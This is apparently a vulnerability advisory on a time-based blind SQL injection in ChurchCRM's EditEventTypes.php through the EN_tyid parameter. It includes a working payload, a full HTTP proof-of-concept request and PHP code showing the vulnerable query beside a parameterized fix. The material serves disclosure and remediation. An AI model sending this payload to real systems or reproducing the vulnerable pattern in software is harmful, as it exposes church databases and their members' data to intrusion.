Description

The endpoint /EditEventTypes.php is vulnerable to time-based Blind SQL Injection via the EN_tyid POST parameter.

The endpoint is reached through the menu Events - List Event Types - Edit Event Types - Save Name. The EN_tyid parameter is taken directly from user input and concatenated into the SQL query without any sanitization or escaping, so an attacker can inject arbitrary SQL through this value and have it executed by the database.

Proof of Concept

Time-based confirmation: MySQL's SLEEP() function is injected so that a successful injection delays the server's response by a measurable interval (5 seconds with the payload below).

Affected Parameter: EN_tyid

Payload: 1' OR SLEEP(5)# (sent URL-encoded as 1'+OR+SLEEP(5)%23 in the request body below)

POST /churchcrm/EditEventTypes.php HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: http://localhost:8888
Connection: close
Referer: http://localhost:8888/churchcrm/EditEventTypes.php
Cookie: CRM-2c90cf299230a50dab55aee824ed9b08=10amb7tfpmsvp76h7kcqtggqf3
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

EN_tyid=1'+OR+SLEEP(5)%23&EN_ctid=&newEvtName=NewEvent&Action=NAME&newEvtStartTime=10%3A30%3A00&newCountName=

Root Cause

User input from the EN_tyid parameter is not sanitized or validated and is concatenated directly into the SQL query string. https://github.com/ChurchCRM/CRM/blob/master/src/EditEventTypes.php#L33,L71

Recommendation

Avoid building the SQL query by string concatenation. Use a parameterized (prepared) query so that EN_tyid is bound as data rather than interpreted as SQL, and additionally validate that EN_tyid is a positive integer before use, since it is an event-type identifier. Input sanitization or escaping alone is a weaker control and should complement, not replace, parameterization.
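The following is an added illustration of the vulnerable pattern beside a parameterized fix; it is not ChurchCRM's code. The table and column names (event_types, type_id, type_name), the UPDATE statement shape and the helper names are assumptions chosen to mirror the PoC payload, not taken from EditEventTypes.php.

```php
<?php
// Added example, not from ChurchCRM. Table/column names are assumptions.

// VULNERABLE: the POST value is spliced into the SQL text.
// With EN_tyid = "1' OR SLEEP(5)#" the resulting statement is
//   UPDATE event_types SET type_name = 'NewEvent' WHERE type_id = '1' OR SLEEP(5)#'
// The quote closes the literal, OR SLEEP(5) runs for every row evaluated,
// and '#' turns the rest of the line (the trailing quote) into a comment.
function buildVulnerableQuery(string $tyid, string $name): string
{
    return "UPDATE event_types SET type_name = '" . $name
        . "' WHERE type_id = '" . $tyid . "'";
}

// FIXED: validate the identifier, then bind both values as parameters.
// The database receives the statement text and the values separately, so
// the payload can only ever be compared against type_id as data.
function updateEventTypeName(PDO $db, $tyid, string $name): int
{
    // Defense in depth: an event-type ID must be a positive integer.
    $id = filter_var($tyid, FILTER_VALIDATE_INT);
    if ($id === false || $id < 1) {
        throw new InvalidArgumentException('EN_tyid must be a positive integer');
    }

    $stmt = $db->prepare('UPDATE event_types SET type_name = ? WHERE type_id = ?');
    $stmt->bindValue(1, $name, PDO::PARAM_STR);
    $stmt->bindValue(2, $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Show the injected statement the vulnerable path would send (runs without a DB).
$payload = "1' OR SLEEP(5)#";          // same value as EN_tyid in the PoC request
echo buildVulnerableQuery($payload, 'NewEvent'), PHP_EOL;

// Hardened path; connection details are placeholders for this example.
if (getenv('DEMO_DSN') !== false) {
    $db = new PDO(getenv('DEMO_DSN'), getenv('DEMO_USER'), getenv('DEMO_PASS'));
    // Use real server-side prepared statements rather than client-side emulation.
    $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

    try {
        // The PoC payload is rejected before any SQL is sent.
        updateEventTypeName($db, $payload, 'NewEvent');
    } catch (InvalidArgumentException $e) {
        echo 'Rejected: ', $e->getMessage(), PHP_EOL;
    }

    // A legitimate request binds 1 as an integer parameter.
    echo 'Rows updated: ', updateEventTypeName($db, '1', 'NewEvent'), PHP_EOL;
}
```

Disabling PDO::ATTR_EMULATE_PREPARES makes MySQL itself handle the placeholders, so the values never pass through client-side quoting. The integer check is not what prevents the injection (the prepared statement does); it simply rejects malformed identifiers early and gives a clear error instead of a silent no-op update.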